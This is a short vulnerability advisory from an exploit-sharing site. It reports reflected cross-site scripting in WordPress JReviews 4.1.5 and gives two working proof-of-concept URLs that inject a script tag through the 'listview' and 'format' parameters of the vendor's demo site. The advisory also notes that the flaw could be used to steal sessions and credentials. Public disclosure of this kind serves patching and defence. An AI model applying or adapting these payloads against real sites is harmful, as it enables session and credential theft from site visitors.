Advertisement
C r a C k E r
T H E C R A C K O F E T E R N A L M I G H T
From The Ashes and Dust Rises An Unimaginable crack....
[ Exploits ]
: Author : CraCkEr :
Website : extensions.joomla.org
Vendor : ClickFWD LLC. - jreviews.com
Software : WordPress JReviews 4.1.5
Vuln Type: Reflected XSS
Method : GET
Impact : Manipulate the content of the site
: :
Release Notes:
The attacker can send to victim a link containing a malicious URL in an email or
instant message can perform a wide variety of actions, such as stealing the victim's
session token or login credentials
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
CraCkEr 2022
URL parameter 'listview' is vulnerable to XSS
Path: /top-user-rated-listings
https://wp-demo.jreviews.com/top-user-rated-listings?listview=2&qrrwx%22%3e%3cscript%3ealert(1)%3c%2fscript%3et16n9=1
URL parameter 'format' is vulnerable to XSS
Path: /advanced-search/search-results
https://wp-demo.jreviews.com/advanced-search/search-results?pg=2&order=featured&query=all&format=raw&mzh9g%22%3e%3cscript%3ealert(1)%3c%2fscript%3ei8emo=1
[-] Done
Copyright ©2023 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.